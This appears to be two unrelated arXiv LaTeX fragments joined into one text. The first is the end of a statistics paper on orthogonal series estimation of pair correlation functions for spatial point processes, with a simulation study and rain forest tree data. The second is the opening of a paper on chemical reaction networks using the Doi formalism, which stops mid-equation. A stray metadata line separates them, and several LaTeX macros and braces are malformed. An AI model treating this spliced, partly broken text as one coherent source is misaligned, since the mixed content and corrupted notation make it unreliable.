\mathcal{D}(B_1, B_2)\geq m, B_1,B_2\in\mathcal{B}({\mathbb R}^d) \big\},
\end{align*}
where $\mathcal{B}({\mathbb R}^d)$ denotes the Borel $\sigma$-field on ${\mathbb R}^d$,
$\mathcal{F}_{X}(B_i)$
is the $\sigma$-field generated by ${X}}%{\mathbf{X}\cap B_i$ and
\[
\mathcal{D}(B_1, B_2) = \inf\big\{\max_{1\leq i\leq d}|u_i-v_i|:
{u}}%{{\mathbf{u}}=(u_1,\ldots,u_d)\in B_1,{v}}%{{\mathbf{v}}=(v_1,\ldots,v_d)\in B_2 \big\}.
\]
To verify asymptotic normality we need the following assumptions as well as V1 (the conditions V2 and V3 are not needed due to conditions N\ref{cond:boundedgfuns} and N\ref{cond:unifbound} below):
\begin{enumerate}
\renewcommand{\theenumi}{\arabic{enumi}}
\renewcommand{\labelenumi}{N\theenumi}
\item \label{cond:mixingcoef}
The
mixing coefficient satisfies $\alpha_{{X}}%{\mathbf{X}}(m;(s+2R)^d,\infty) =
O(m^{-d-\varepsilon})$ for some $s,\varepsilon>0$.
\item \label{cond:boundedgfuns}
There exists a $\eta>0$ and $L_{1}<\infty$
such that $g^{(k)}({h}}{%{{\mathbf{h}}_1,\ldots,{h}}{%{{\mathbf{h}}_{k-1})\leq L_{1}$ for $k=2,\ldots,
2(2+\lceil \eta \rceil )$ and all ${h}}{%{{\mathbf{h}}_1,\ldots,{h}}{%{{\mathbf{h}}_{k-1}\in{\mathbb R}^{d}$.
\item \label{cond:liminfvar}
$\liminf_{n \rightarrow \infty} \tau^2_n >0$.
\item \label{cond:unifbound}
There exists $L_2 < \infty$ so that
$| f_n({h}}{%{{\mathbf{h}}) | \le L_2$ for all $n \ge 1$ and ${h}}{%{{\mathbf{h}} \in {B_\rmin^{R}}$.
\end{enumerate}
The conditions N1-N\ref{cond:liminfvar} are standard in the point process
literature, see e.g.\ the discussions in \cite{waagepetersen:guan:09}
and \cite{coeurjolly:moeller:14}.
The condition N\ref{cond:liminfvar} is difficult to verify and is usually
left as an assumption, see \cite{waagepetersen:guan:09},
\cite{coeurjolly:moeller:14} and \cite{dvovrak:prokevov:16}.
However, at least in the stationary case, and in case
of estimation of $\hat \theta_{k,n}$, the expression
for $\text{var}(\hat \theta_{k,n})$ in Section~S2 of the supplementary
material
shows that $\tau_n^2=|W_n| \text{var}(\hat \theta_{k,n})$ converges to
a constant which supports the plausibility of condition N\ref{cond:liminfvar}.
We discuss N\ref{cond:unifbound} in further detail
below when applying the general framework to $\hat \theta_{k,n}$ and
$\hat g_{o,n}$.
The following theorem is proved in Section~S3 of the supplementary
material.
\begin{theorem}\label{theo:coefnormality
Under conditions V1, N1-N4,
$\tau_{n}^{-1} |W_n|^{1/2} \big\{ S_n - E(S_n) \big\} \stackrel{D}{\longrightarrow} N(0, 1)$.
\end{theorem}
\subsection{Application to $\hat \theta_{k,n}$ and $\hat g_{o,n}$}
In case of estimation of $\theta_{k}$, $\hat{\theta}_{k,n}=S_n$ with
$f_n({h}}{%{{\mathbf{h}})= \phi_k(\|{h}}{%{{\mathbf{h}}\|-{r_{\min}})w(\|{h}}{%{{\mathbf{h}}\|-{r_{\min}})/\|{h}}{%{{\mathbf{h}}\|^{d-1}$.
The assumption N\ref{cond:unifbound} is then straightforwardly
seen to hold in the case of the Fourier-Bessel
basis where $|\phi_k(r)|\le |\phi_k(0)|$ and $w(r)=r^{d-1}$. For the
cosine basis, N\ref{cond:unifbound} does not hold in general and further assumptions are needed, cf.\ the discussion in Section~\ref{sec:varthetak}. For simplicity we here just assume ${r_{\min}}>0$.
Thus we state the following\begin{corollary}
Assume V1, N1-N4, and, in case of the cosine basis, that ${r_{\min}}>0$. Then
\[
\{\text{var}(\hat \theta_{k,n})\}^{-1/2} (\hat \theta_{k,n} -\theta_{k}) \stackrel{D}{\longrightarrow} N(0, 1). \]
\end{corollary}
For $\hat g_{o,n}(r;b)=S_n$,
\[
f_n({h}}{%{{\mathbf{h}})=\frac{\varphi_n({h}}{%{{\mathbf{h}},r) w(\|{h}}{%{{\mathbf{h}}\|-{r_{\min}})}{\|{h}}{%{{\mathbf{h}}\|^{d-1}}
= \frac{w(\|{h}}{%{{\mathbf{h}}\|-{r_{\min}})}{\|{h}}{%{{\mathbf{h}}\|^{d-1}}
\sum_{k=1}^{K_n} b_k(\psi_n) \phi_k(\|{h}}{%{{\mathbf{h}}\|-{r_{\min}}) \phi_k(r-{r_{\min}}),
\]
where $\varphi_n$ is defined in \eqref{eq:hn}.
In this case, $f_n$ is typically not uniformly bounded since the
number of not necessarily decreasing terms in the sum
defining $\varphi_n$ in \eqref{eq:hn} grows with $n$. We therefore
introduce one more condition:
\begin{enumerate}
\renewcommand{\theenumi}{\arabic{enumi}}
\renewcommand{\labelenumi}{N\theenumi}
\setcounter{enumi}{4}
\item \label{cond:Knbound} There exist an $\omega>0$ and $M_\omega<\infty$ so that
\[ K_{n}^{-\omega} \sum_{k=1}^{K_n}
b_k(\psi_n)\big |\phi_k(r-{r_{\min}})\phi_k(\|{h}}{%{{\mathbf{h}}\|-{r_{\min}}) \big| \leq M_{\omega} \]
for all ${h}}{%{{\mathbf{h}}\in{B_\rmin^{R}}$.
\end{enumerate}
Given N\ref{cond:Knbound}, we can simply rescale: $\tilde{S}_n:= K_n^{-\omega} S_n$
and $\tilde \tau^2_n:=K_n^{-2\omega} \tau^2_n$.
Then, assuming $\liminf_{n \rightarrow \infty} \tilde \tau_n^2 >0$,
Theorem~\ref{theo:coefnormality} gives the asymptotic normality of
$\tilde \tau_n^{-1}|W_n|^{1/2} \{\tilde{S}_n- E(\tilde{S}_n)\}$
which is equal to $\tau_n^{-1}|W_n|^{1/2}\{S_n- E(S_n)\}$.
Hence we obtain
\begin{corollary}
Assume V\ref{cond:rho},
N\ref{cond:mixingcoef}-N\ref{cond:boundedgfuns}, N\ref{cond:Knbound} and
$\liminf_{n \rightarrow \infty} K_n^{-2\omega} \tau_n^2>0$.
In case of the cosine basis, assume further ${r_{\min}}>0$.
Then for $r\in({r_{\min}},{r_{\min}}+R)$,
\[
\tau_n^{-1}|W_n|^{1/2} \big[ \hat{g}_{o,n}(r;b)- E\{\hat g_{o,n}(r;b)\} \big] \stackrel{D}{\longrightarrow} N(0, 1).
\]
\end{corollary}
In case of the simple smoothing scheme $b_k(\psi_n)=\mathbbm{1}(k \le K_n)$,
we take $\omega=1$ for the cosine basis. For the
Fourier-Bessel basis we take $\omega=4/3$ when $d=1$ and
$\omega=d/2+2/3$ when $d>1$ (see the derivations in Section~S6 of the
supplementary material).
\section{Tuning the smoothing scheme}\label{sec:miseest}
In practice we choose $K$, and other parameters in
the smoothing scheme $b(\psi)$, by minimizing an estimate of the
mean integrated squared error.
This is equivalent to minimizing
\begin{equation} \label{eq:Ipsi} {\text{sa}_d} I(\psi) = \textsc{mise}(\hat g_{o}, w)
\! - \!
\int_{{r_{\min}}}^{{r_{\min}}+R} \!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\! \big\{ g(r) - 1 \big\}^2 w(r) {\mathrm{d}} r =
\sum_{k=1}^{K} \big[ b_{k}(\psi)^2 E\{(\hat{\theta}_{k})^2\}
-2b_k(\psi) \theta_{k}^2 \big].
\end{equation}
In practice we must replace \eqref{eq:Ipsi} by an
estimate. Define $\widehat{\theta^2_k}$ as
\[ \sum_{\substack{{u}}%{{\mathbf{u}},{v}}%{{\mathbf{v}},{u}}%{{\mathbf{u}}',{v}}%{{\mathbf{v}}' \in {X}}%{\mathbf{X}_W\\ {v}}%{{\mathbf{v}}-{u}}%{{\mathbf{u}},{v}}%{{\mathbf{v}}'-{u}}%{{\mathbf{u}}' \in B_{r_{\min}}^R }}^{\neq}
\!\!\!\!\!\!\! \frac{\phi_k(\|{v}}%{{\mathbf{v}}-{u}}%{{\mathbf{u}}\|-{r_{\min}})\phi_k(\|{v}}%{{\mathbf{v}}'-{u}}%{{\mathbf{u}}'\|-{r_{\min}})w(\|{v}}%{{\mathbf{v}}-{u}}%{{\mathbf{u}}\|-{r_{\min}})w(\|{v}}%{{\mathbf{v}}'-{u}}%{{\mathbf{u}}'\|-{r_{\min}})}{{\text{sa}_d}^2
\rho({u}}%{{\mathbf{u}})\rho({v}}%{{\mathbf{v}})\rho({u}}%{{\mathbf{u}}')\rho({v}}%{{\mathbf{v}}')
\|{v}}%{{\mathbf{v}}-{u}}%{{\mathbf{u}}\|^{d-1} \|{v}}%{{\mathbf{v}}'-{u}}%{{\mathbf{u}}'\|^{d-1} |W \cap W_{{v}}%{{\mathbf{v}}-{u}}%{{\mathbf{u}}}| | W \cap W_{{v}}%{{\mathbf{v}}'-{u}}%{{\mathbf{u}}'}|}.
\]
Then, referring to the set-up in Section~\ref{sec:asympresults} and assuming V\ref{cond:boundedg4integ},
\[
\lim_{n \rightarrow \infty} E(\widehat{\theta^2_{k,n}}) \to
\left\{\int_{0}^{R} g(r+{r_{\min}}) \phi_k(r) w(r) {\mathrm{d}} r \right\}^2
=\theta_k^2
\]
(see Section~S4 of the supplementary material)
and hence
$\widehat{\theta^2_{k,n}}$
is an asymptotically unbiased estimator of $\theta_{k}^2$. The
estimator is obtained from $(\hat \theta_k)^2$ by retaining only terms
where all four points ${u}}%{{\mathbf{u}},{v}}%{{\mathbf{v}},{u}}%{{\mathbf{u}}',{v}}%{{\mathbf{v}}'$ involved are
distinct. In simulation studies, $\widehat{\theta_k^2}$ had a smaller root mean squared error than $(\hat \theta_k)^2$ for estimation of $\theta_k^2$.
Thus
\begin{equation}\label{eq:Ipsiestm}
\hat I(\psi) = \sum_{k=1}^{K}
\big\{ b_{k}(\psi)^2 (\hat{\theta}_{k})^2
-2 b_k(\psi) \widehat{\theta_{k}^2} \big\}
\end{equation}
is an asymptotically unbiased estimator of~\eqref{eq:Ipsi}. Moreover, \eqref{eq:Ipsiestm} is equivalent to the following slight modification of
\cite{guan:leastsq:07}'s criterion \eqref{eq:ywcv}:
\[
\int_{{r_{\min}}}^{{r_{\min}}+R} \big\{ \hat{g}_{o}(r;b) \big\}^2 w(r-{r_{\min}}) {\mathrm{d}} r
-\frac{2}{{\text{sa}_d}} \sum_{\substack{{u}}%{{\mathbf{u}},{v}}%{{\mathbf{v}}\in X_{W}\\ {v}}%{{\mathbf{v}}-{u}}%{{\mathbf{u}}\in B_{r_{\min}}^R}}^{\neq}
\frac{\hat{g}_{o}^{-\{{u}}%{{\mathbf{u}},{v}}%{{\mathbf{v}}\}}(\|{v}}%{{\mathbf{v}}-{u}}%{{\mathbf{u}}\|;b)w(\|{v}}%{{\mathbf{v}} -{u}}%{{\mathbf{u}}\|-{r_{\min}})}{
\rho({u}}%{{\mathbf{u}}) \rho({v}}%{{\mathbf{v}})|W \cap W_{{v}}%{{\mathbf{v}}-{u}}%{{\mathbf{u}}}|}.
\]
For the simple smoothing scheme $b_k(K)=\mathbbm{1}(k\leq K)$, \eqref{eq:Ipsiestm}
reduces to
\begin{equation}\label{eq:Isimple}
\hat I(K) = \sum_{k=1}^{K}
\big\{ (\hat{\theta}_{k})^2 -2 \widehat{\theta_{k}^2} \big\}
= \sum_{k=1}^{K} (\hat{\theta}_{k})^2 ( 1 -2 \hat{b}^{*}_{k}),
\end{equation}
where $\hat{b}^{*}_{k}=\widehat{\theta_{k}^2}/(\hat{\theta}_{k})^2$ is
an estimator of $b^{*}_{k}$ in~\eqref{eq:bstar}.
In practice, uncertainties
of $\hat \theta_{k}$ and $\widehat{\theta_{k}^{2}}$
lead to numerical instabilities in the minimization of~\eqref{eq:Ipsiestm}
with respect to $\psi$. To obtain a numerically stable procedure we first determine $K$ as
\begin{equation}\label{eq:Kestim}
\hat K = \inf \{2 \le k \le K_{\max}: (\hat{\theta}_{k+1})^2
-2 \widehat{\theta_{k+1}^2} > 0 \}
= \inf \{2 \le k \le K_{\max}: \hat{b}^{*}_{k+1} < 1/2 \}.
\end{equation}
That is, $\hat K$ is the first local minimum of \eqref{eq:Isimple}
larger than 1 and smaller than an upper limit $K_{\max}$ which we chose to be
49 in the applications. This choice of $K$ is also used for the refined and the Wahba smoothing schemes.
For the refined smoothing scheme we thus let $b_{k}=\mathbbm{1}(k\leq \hat K)\hat{b}_{k}^{*}$. For the Wahba smoothing
scheme $b_{k}=\mathbbm{1}(k\leq \hat K)/(1 + \hat c_1k^{\hat c_2})$, where $\hat c_1$ and $\hat c_2$ minimize $ \sum_{k=1}^{\hat K}
\left\{ (\hat{\theta}_{k})^2/(1 + c_1k^{c_2})^2 -
2 \widehat{\theta_{k}^2}/(1 + c_1k^{c_2}) \right\}$
over $c_1>0$ and $c_2>1$.
\section{Simulation study}
\label{sec:simstudy}
\begin{figure}
\centering
\includegraphics[width=\textwidth,scale=1]{gfuns.pdf}
\caption{Pair correlation functions for the point processes considered in the simulation study.
\label{fig:gfuns}
\end{figure}
We compare the performance of the orthogonal series estimators and
the kernel estimators for data simulated on $W=[0,1]^2$ or
$W=[0,2]^2$ from four point processes with constant intensity $\rho=100$.
More specifically, we consider $n_{\text{sim}}=1000$ realizations from a Poisson process,
a Thomas process (parent intensity $\kappa=25$, dispersion standard deviation $\omega=0.0198$),
a Variance Gamma cluster process \citep[parent intensity
$\kappa=25$, shape parameter $\nu=-1/4$, dispersion parameter $\omega=0.01845$,][]{jalilian:guan:waagepetersen:13}, and a determinantal point process
with pair correlation function $g(r)=1-\exp\{-2 (r/\alpha)^2\}$
and $\alpha=0.056$. The pair correlation functions of these point processes are shown in Figure~\ref{fig:gfuns}.
For each realization,
$g(r)$ is estimated for $r$ in $({r_{\min}}, {r_{\min}}+ R)$, with ${r_{\min}}=10^{-3}$ and $R=0.06, 0.085, 0.125$,
using the kernel estimators $\hat{g}_{k}(r; b)$, $\hat{g}_{d}(r; b)$ and
$\hat{g}_{c}(r; b)$ or the orthogonal series estimator $\hat{g}_{o}(r;b)$.
The Epanechnikov kernel with bandwidth $b=0.15/\surd{\hat{\rho}}$
is used for $\hat{g}_{k}(r; b)$
and $\hat{g}_{d}(r; b)$ while the bandwidth of $\hat{g}_{c}(r; b)$
is chosen by minimizing \cite{guan:leastsq:07}'s estimate \eqref{eq:ywcv} of
the mean integrated squared error.
For the orthogonal series estimator, we consider both the cosine and the Fourier-Bessel
bases with simple, refined or Wahba smoothing schemes.
For the Fourier-Bessel basis we use the modified orthogonal series
estimator described in Section~\ref{sec:g-1}. The parameters for the smoothing
scheme are chosen according to Section~\ref{sec:miseest}.
From the simulations we estimate the mean integrated squared error \eqref{eq:mise} with $w(r)=1$ of each estimator $\hat g_m$, $m=k,d,c,o$,
over the intervals $[{r_{\min}}, 0.025]$ (small spatial lags) and
$[{r_{\min}}, {r_{\min}}+R]$ (all lags).
We consider the kernel estimator $\hat{g}_{k}$
as the baseline estimator and compare any of the other estimators $\hat g$
with $\hat{g}_{k}$ using the log relative efficiency
$e_{I}(\hat{g}) = \log \{ \widehat{\textsc{mise}}_{I}(\hat{g}_{k})/\widehat{\textsc{mise}}_{I}(\hat{g}) \}$, where $\widehat{\textsc{mise}}_{I}(\hat{g})$ denotes the estimated mean squared integrated error over the interval $I$ for the estimator $\hat{g}$. Thus
$e_{I}(\hat{g}) > 0$ indicates that $\hat{g}$ outperforms
$\hat{g}_{k}$ on the interval $I$.
Results for W=$[0,1]^2$ are summarized in Figure~\ref{fig:efficiencies}.
\begin{figure}
\centering
\begin{tabular}{cc}
\includegraphics[width=\textwidth]{plot11new.pdf}
\end{tabular}
\caption{Plots of log relative efficiencies for small lags $({r_{\min}},
0.025]$ and all lags $({r_{\min}}, R]$, $R=0.06,0.085,0.125$, and $W=[0,1]^2$. Black: kernel estimators. Blue and red: orthogonal series estimators with Bessel respectively
cosine basis. Lines serve to ease visual interpretation.}\label{fig:efficiencies}
\end{figure}
For all types of point processes, the orthogonal series estimators
outperform or does as well as the kernel estimators both at small lags
and over all lags. The detailed conclusions depend on whether the non-repulsive Poisson, Thomas and Var Gamma processes or the repulsive determinantal process are considered. Orthogonal-Bessel with refined or Wahba smoothing is superior for Poisson, Thomas and Var Gamma but only better than $\hat g_c$ for the determinantal point process. The performance of the orthogonal-cosine estimator is between or better than the performance of the kernel estimators for Poisson, Thomas and Var Gamma and is as good as the best kernel estimator for determinantal. Regarding the kernel estimators, $\hat g_c$ is better than $\hat g_d$ for Poisson, Thomas and Var Gamma and worse than $\hat g_d$ for determinantal.
The above conclusions are stable over the three $R$ values
considered. For $W=[0,2]^2$ (see Figure~S1 in the supplementary
material) the conclusions are similar but with more clear superiority of the orthogonal series
estimators for Poisson and Thomas. For Var Gamma the performance of
$\hat g_c$ is similar to the orthogonal series estimators. For determinantal and
$W=[0,2]^2$, $\hat g_c$ is better than
orthogonal-Bessel-refined/Wahba but still inferior to
orthogonal-Bessel-simple and orthogonal-cosine.
Figures~S2 and S3 in the supplementary material give a more
detailed insight in the bias and variance properties for $\hat g_k$,
$\hat g_c$, and the orthogonal series estimators with simple smoothing scheme.
Table~S1 in the supplementary material shows that the selected $K$ in
general increases when the observation window is enlargened, as
required for the asymptotic results. The general
conclusion, taking into account the simulation results for all four
types of point processes, is that the best
overall performance is obtained with orthogonal-Bessel-simple, orthogonal-cosine-refined or orthogonal-cosine-Wahba.
To supplement our theoretical results in Section~\ref{sec:asympresults}
we consider the distribution of the simulated $\hat g_o(r;b)$ for $r=0.025$
and $r=0.1$ in case of the Thomas process and using the Fourier-Bessel
basis with the simple smoothing scheme. In addition to $W=[0,1]^2$ and
$W=[0,2]^2$, also $W=[0,3]^2$ is considered. The mean, standard error,
skewness and kurtosis of $\hat{g}_{o}(r)$ are given in Table~\ref{tab:fsampleghat}
while histograms of the estimates are shown in Figure~S3.
The standard error of $\hat g_{o}(r;b)$ scales as $|W|^{1/2}$
in accordance with our theoretical results. Also the bias decreases and
the distributions of the estimates become increasingly normal as $|W|$ increases.
\begin{table}
\caption{Monte Carlo mean, standard error, skewness (S)
and kurtosis (K) of $\hat{g}_{o}(r)$ using the Bessel basis
with the simple smoothing scheme in case of the Thomas process on observation
windows $W_1=[0,1]^2$, $W_2=[0,2]^2$ and $W_3=[0,3]^3$.}%
\begin{tabular}{ccccccc}
& $r$ & $g(r)$ & $\hat{E}\{\hat{g}_{o}(r)\}$ & $[\hat{\text{var}}\{\hat{g}_{o}(r)\}]^{1/2}$
& $\hat{\text{S}}\{\hat{g}_{o}(r)\}$ & $\hat{\text{K}}\{\hat{g}_{o}(r)\}$ \\
$W_1$ & 0.025 & 3.972 & 3.961 & 0.923 & 1.145 & 5.240 \\
$W_1$ & 0.1 & 1.219 & 1.152 & 0.306 & 0.526 & 3.516 \\
$W_2$ & 0.025 & 3.972 & 3.959 & 0.467 & 0.719 & 4.220 \\
$W_2$ & 0.1 & 1.219 & 1.187 & 0.150 & 0.691 & 4.582 \\
$W_3$ & 0.025 & 3.972 & 3.949 & 0.306 & 0.432 & 3.225 \\
$W_3$ & 0.1 & 1.2187 & 1.2017 & 0.0951 & 0.2913 & 2.9573
\end{tabular}
\label{tab:fsampleghat}
\end{table}
\section{Application}
\label{sec:example}
We consider point patterns of locations of \emph{Acalypha diversifolia}
(528 trees), \emph{Lonchocarpus heptaphyllus} (836 trees) and
\emph{Capparis frondosa} (3299 trees) species in the 1995 census for
the $1000\text{m}\times 500\text{m}$ Barro Colorado Island plot \citep{hubbell:foster:83,condit:98}.
To estimate the intensity function of each species, we use a log-linear regression model
depending on soil condition (contents of copper,
mineralized nitrogen, potassium and phosphorus and soil acidity) and topographical
(elevation, slope gradient, multiresolution
index of valley bottom flatness, ncoming mean solar radiation
and the topographic wetness index) variables. The regression parameters
are estimated using the quasi-likelihood approach
in~\cite{guan:jalilian:waagepetersen:15}. The point patterns and fitted intensity functions are shown in Figure~S5 in the supplementary material.
The pair correlation function of each species is then estimated using
the bias corrected kernel estimator $\hat{g}_{c}(r;b)$ with $b$ determined by minimizing~\eqref{eq:ywcv} and the orthogonal series estimator
$\hat{g}_{o}(r;b)$ with both Fourier-Bessel and cosine basis,
refined smoothing scheme and the optimal cut-offs $\hat{K}$ obtained from~\eqref{eq:Kestim};
see Figure~\ref{fig:bcipcfs}.
For {\em Lonchocarpus} the three estimates are
quite similar while for {\em Acalypha} and {\em Capparis} the estimates deviate markedly
for small lags and then become similar for lags
greater than respectively 2 and 8 meters. For {\em Capparis} and the
cosine basis, the number of selected coefficients coincides with the chosen upper limit 49 for the number of coefficients. The cosine estimate displays oscillations which appear to be artefacts of
using high frequency components of the cosine basis. The function
\eqref{eq:Isimple} decreases very slowly after $K=7$ so we also tried
the cosine estimate with $K=7$ which gives a more reasonable
estimate.
\begin{figure}
\centering
\includegraphics[width=0.33\textwidth]{acapcfest.pdf
\includegraphics[width=0.33\textwidth]{loncopcfest.pdf
\includegraphics[width=0.33\textwidth]{capppcfest.pdf
\caption{Estimated pair correlation functions for tropical rain forest
trees.}
\label{fig:bcipcfs}
\end{figure}
\section*{Acknowledgement}
Rasmus Waagepetersen is supported by the Danish Council for Independent Research | Natural Sciences, grant "Mathematical and Statistical Analysis of Spatial Data", and by the "Centre for Stochastic Geometry and Advanced Bioimaging", funded by the Villum Foundation.
\section*{Supplementary material}
Supplementary material
includes proofs of consistency and asymptotic normality results
and details of the simulation study and data analysis.
\bibliographystyle{apalike}
| 2024-02-18T23:40:10.085Z | 2017-02-07T02:13:36.000Z | algebraic_stack_train_0000 | 1,523 | 7,533 |
|
proofpile-arXiv_065-7489 | \section{Framework and Results}
In what follows, we develop a convenient formalism for describing CRN's,
by combining a network decomposition
made standard by CRN-theory \cite{Feinberg:notes:79,Gunawardena:CRN_for_bio:03}
with the well-known stochastic process formalism due to Doi \cite{Doi:SecQuant:76}. To our knowledge, no one has combined these two methods earlier.
The description of CRN's simplifies considerably within this framework. In
addition this formalism is crucial to understanding why the equations
for the FM have the structure they do.
We hence utilize two simple examples of CRN's with non-zero deficiency, to explain both the formalism and our results.
We also provide a definition for the very important concept of deficiency.
\subsection{Two examples}
Our first example is the following minimal model
with just one species and $\delta=1$,
\begin{figure}[ht]
\begin{center}
\includegraphics[scale=0.6]{g_123_conn_labeled.eps}
\caption{A compact graphical representation for a CRN: The red filled circle
with label
${\rm A}$ represents the {\em species} ${\rm A}$
while each open circle represents a {\em complex},
such
as $2 {\rm A}$. The number of solid lines connecting each species to
each complex, represents the {\it stoichiometry} of the complex.
Each dashed line connecting two complexes represents a
\textit{reaction}.
\label{fig:g_123_conn}
}
\end{center}
\end{figure}
Its reaction scheme is
\begin{align}
{\rm A}
& \xrightleftharpoons[\epsilon]{\alpha}
2 {\rm A} \xrightleftharpoons[\beta]{\epsilon}
3 {\rm A}
\label{eq:A_AA_AAA_R_scheme}
\end{align}
Another example is the following CRN with two species
and $\delta=2$:
\begin{figure}[ht]
\begin{center}
\includegraphics[scale=0.6]{two_species_bistable_labeled.eps}
\caption{
%
A CRN involving two species ${\rm A}$ and ${\rm B}$.
The complex with no solid lines
attached to it is the null node $\varnothing$.
\label{fig:two_species_bistable}
}
\end{center}
\end{figure}
Its reaction scheme is
\begin{align}
& {\rm B} \xrightleftharpoons[\epsilon]{k_2}
\varnothing
\xrightleftharpoons[k_2]{\epsilon}
{\rm A} \nonumber \\
& 2 {\rm B} + {\rm A}
\xrightleftharpoons[k_1]{{\bar{k}}_1}
{\rm A} + {\rm B} \xrightleftharpoons[{\bar{k}}_1]{k_1}
2 {\rm A} + {\rm B}
\label{eq:cubic_2spec_scheme}
\end{align}
In the description of CRN's two matrices conventionally appear \cite{Feinberg:notes:79, Gunawardena:CRN_for_bio:03}.
An \textit{Adjacency matrix}, denoted by ${\cal{A}}$,
is the matrix of transition rates among complexes.
The matrix element ${\cal{A}}_{ij}$ for $i \neq j$ denotes the transition
(if any) that takes complex $j$ to complex $i$, with
${\cal{A}}_{jj} \equiv -\sum_i{\cal{A}}_{ij}$.
$\cal{A}$ has, by definition,
a zero left eigenvector $\left[ 1,1,..1 \right]$.
For the network in Fig. \ref{fig:g_123_conn} the
adjacency matrix is
\begin{equation}
\cal{A} =
\left[
\begin{array}{rrr}
- \alpha & \epsilon & 0 \\
\alpha & - 2\epsilon & \beta \\
0 & \epsilon & -\beta \\
\end{array}
\right] .
\label{eq:A_AA_AAA_rate_matrix}
\end{equation}
For the network in Fig. \ref{fig:two_species_bistable},
$\cal{A}$ is a $6 \times 6$ matrix over the
$6$ complexes: $\varnothing$, $\rm A$, $\rm B$, $\rm{A+B}$, $\rm{2A+B}$ and $\rm {A+2B}$.
\begin{equation}
\cal{A} =
\left[
\begin{array}{rrrrrr}
- 2\epsilon & k_2 & k_2 & 0&0&0 \\
\epsilon & - k_2 & 0 &0&0&0 \\
\epsilon &0& - k_2 & 0 &0&0 \\
0&0&0& -2 k_1& {\bar{k}}_1&{\bar{k}}_1 \\
0&0&0& k_1& -{\bar{k}}_1& 0 \\
0&0&0& k_1& 0 & -{\bar{k}}_1 \\
\end{array}
\right] .
\label{eq:A_AA_AAA_rate_matrix}
\end{equation}
We assume mass-action rates (as in earlier work \cite{Feinberg:def_01:87, Anderson:product_dist:10}):
if ${\rm n}_a$ is the number of particles
of species ${\rm A}$, the rate at which complex ${\rm A}$ is converted
to any other complex is the rate constant times
${\rm n}_a$. Similarly the rate at which complex $2 {\rm A}$
takes part in any reaction is ${\rm n}_a \left({\rm n}_a - 1 \right)$, {\em etc}.
The other matrix which is useful to define is the stoichiometric matrix $Y$.
An element $y_{p,i}$ of this matrix is the amount of
species $p$ in complex $i$. We denote by $Y_p$,
the $p^{th}$ row of this matrix.
For example, in the reaction scheme of Eq. (\ref{eq:A_AA_AAA_R_scheme}),
$Y$ is a row vector given by
\begin{equation}
Y =
\left[
\begin{array}{ccc}
1 & 2 & 3
\end{array}
\right]
\label{eq:123_y_form}
\end{equation}
For the reaction scheme of Eq. (\ref{eq:cubic_2spec_scheme}),
the $Y$ matrix is
\begin{equation}
Y =
\left[
\begin{array}{cccccc}
0 & 1 & 0 & 1 & 2 & 1 \\
0 & 0 & 1 & 1 & 1 & 2 \\
\end{array}
\right]
\label{eq:cubic_y_form}
\end{equation}
where the first row $Y_1$ refers to species $\rm A$, the second row $Y_2$
to species $\rm B$ and the columns $i$ refer to the complexes
in the order mentioned above.
The time-evolution of the species in a CRN, is described
by a master equation for the probability
${\rho}_{{\rm n}}$, where ${\rm n} \equiv \left[ {\rm n}_p \right]$
is a column vector,
with components which are the instantaneous
numbers of the different species $p$.
For example, for the CRN of Eq. (\ref{eq:A_AA_AAA_R_scheme}), the master equation is
\begin{align}
{\dot{\rho}}_{\rm n}
& =
\left\{
\left( e^{-\partial / \partial {\rm n}} -1 \right)
\left[
\alpha {\rm n} +
\epsilon {\rm n} \left( {\rm n} - 1 \right)
\right]
\right.
\nonumber \\
& \phantom{=}
\mbox{} +
\left.
\left( e^{\partial / \partial {\rm n}} -1 \right)
\left[
\epsilon {\rm n} \left( {\rm n} - 1 \right) +
\beta
{\rm n} \left( {\rm n}-1 \right) \left( {\rm n}-2 \right)
\right]
\right\}
{\rho}_{\rm n} .
\label{eq:ME_g_123_R}
\end{align}
where the operators $e^{-\partial / \partial {\rm n}}$ (or
$e^{\partial / \partial {\rm n}}$)
act on any function $f \! \left( {\rm n} \right)$ and convert it to $f
\! \left( {\rm n}-1 \right)$ ($f \! \left( {\rm n} +1 \right)$ respectively)
\cite{Smith:LDP_SEA:11}.
For the network of Fig.~\ref{fig:two_species_bistable}, $\rm n$ becomes a
two-component index to $\rho$, which evolves under
\begin{align}
{\dot{\rho}}_{\rm n}
& =
\left\{
\left( e^{-\partial / \partial {\rm n}_a} -1 \right)
\left[
\epsilon +
k_1 {\rm n}_b {\rm n}_a
\right]
\right.
\nonumber \\
& \phantom{=}
\mbox{} +
\left.
\left( e^{\partial / \partial {\rm n}_a} -1 \right)
\left[
k_2 {\rm n}_a +
{\bar{k}}_1
{\rm n}_b {\rm n}_a \left( {\rm n}_a-1 \right)
\right]
\right.
\nonumber \\
& \phantom{=}
\mbox{} +
\left.
\left( e^{-\partial / \partial {\rm n}_b} -1 \right)
\left[
\epsilon +
k_1 {\rm n}_a {\rm n}_b
\right]
\right.
\nonumber \\
& \phantom{=}
\mbox{} +
\left.
\left( e^{\partial / \partial {\rm n}_b} -1 \right)
\left[
k_2 {\rm n}_b +
{\bar{k}}_1
{\rm n}_a {\rm n}_b \left( {\rm n}_b-1 \right)
\right]
\right\}
{\rho}_{\rm n}
\label{eq:ME_two_species_bistable}
\end{align}
In general, for a CRN with $P$ species,
the master equation is more conveniently written in terms
of an equation for the generating function $\phi (z) \equiv \sum_{{\rm n}} \left(\prod_{p = 1}^P z_p^{{{\rm n}}_p} \right) {\rho}_{{\rm n}}$
where $z\equiv \left[ z_p \right]$ is a vector.
The generating function evolves under a \textit{Liouville equation} of
the form
\begin{align}
\frac{\partial \phi}{\partial \tau} =
- \mathcal{L} \phi
\nonumber \\
\mbox{shorthand for } \quad
\frac{\partial}{\partial \tau}
\phi \! \left( z \right)
& =
- \mathcal{L} \!
\left( z , \frac{\partial}{\partial z} \right)
\phi \! \left( z \right) .
\label{eq:Liouville_eq_multi_arg}
\end{align}
$\mathcal{L}$ is called the \textit{Liouville Operator}.
\subsection {The Liouvillian}
$\mathcal{L}$ has a well-known representation, due to Doi \cite{Doi:SecQuant:76}, in terms of raising and lowering operators $a^{\dagger}$ and $a$.
We provide a brief introduction to the Doi algebra below \footnote{Much more comprehensive treatments are to be found in \cite{Cardy:FTNeqSM:99,Mattis:RDQFT:98}. Interpretations of terms in the Doi algebra in the language of conventional generating functions is elaborated on in detail in \cite{Smith:evo_games:15}.}.
The Doi algebra uses the following correspondence:
\begin{align}
z_p
& \rightarrow a^{\dagger}_p
&
\frac{\partial}{\partial z_p}
& \rightarrow
a_p .
